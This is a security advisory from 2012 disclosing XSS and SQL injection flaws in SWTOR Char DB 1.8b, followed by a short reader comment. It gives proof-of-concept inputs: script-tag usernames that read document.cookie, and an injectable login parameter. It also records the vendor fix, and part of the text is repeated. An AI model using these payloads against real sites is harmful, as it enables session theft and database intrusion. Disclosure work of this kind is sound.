SSCHADV2012-009 - Star Wars Old Republic - SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory:
|
Star Wars Old Republic – SWTOR Char DB 1.8b Multiple security vulnerabilities
|
Advisory ID: | SSCHADV2012-009 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on Star Wars Old Republic – SWTOR Char DB 1.8b |
Vendor URL: | |
Vendor Status: |
fixed
|
OSVDB ID:
|
80841, 80842
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
SWTOR Char DB 1.8b is prone to multiple security vulnerabilities
==============
PoC-Exploit
==============
XSS
http://[target]/swtor/user/register.php
Username: <script>alert(document.cookie)</script>
Password: whatever
Stored XSS
http://[target]/swtor/user/register.php
Username: 1—>1<ScRiPt >alert(document.cookie)</ScRiPt><!—
Password: whatever
Visit: http://[target]/swtor/index.php?view=members
SQL-Injection
http://[target]/swtor/user/login_check.php?swtorpw=1&swtorun=[sql injection]
=====
Solution
=====
Update to the latest version
================
Disclosure Timeline
================
17-Mar-2012 – vendor informed (contact form)
25-Mar-2012 – fixed in Version 1.8c
PoC-Exploit
==============
XSS
http://[target]/swtor/user/register.php
Username: <script>alert(document.cookie)</script>
Password: whatever
Stored XSS
http://[target]/swtor/user/register.php
Username: 1—>1<ScRiPt >alert(document.cookie)</ScRiPt><!—
Password: whatever
Visit: http://[target]/swtor/index.php?view=members
SQL-Injection
http://[target]/swtor/user/login_check.php?swtorpw=1&swtorun=[sql injection]
=====
Solution
=====
Update to the latest version
================
Disclosure Timeline
================
17-Mar-2012 – vendor informed (contact form)
25-Mar-2012 – fixed in Version 1.8c
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-009.txt
Comments
Display comments as Linear | Threaded
David "PrivateSniper" Craig on :
Version 1.8c just released to fix this issue.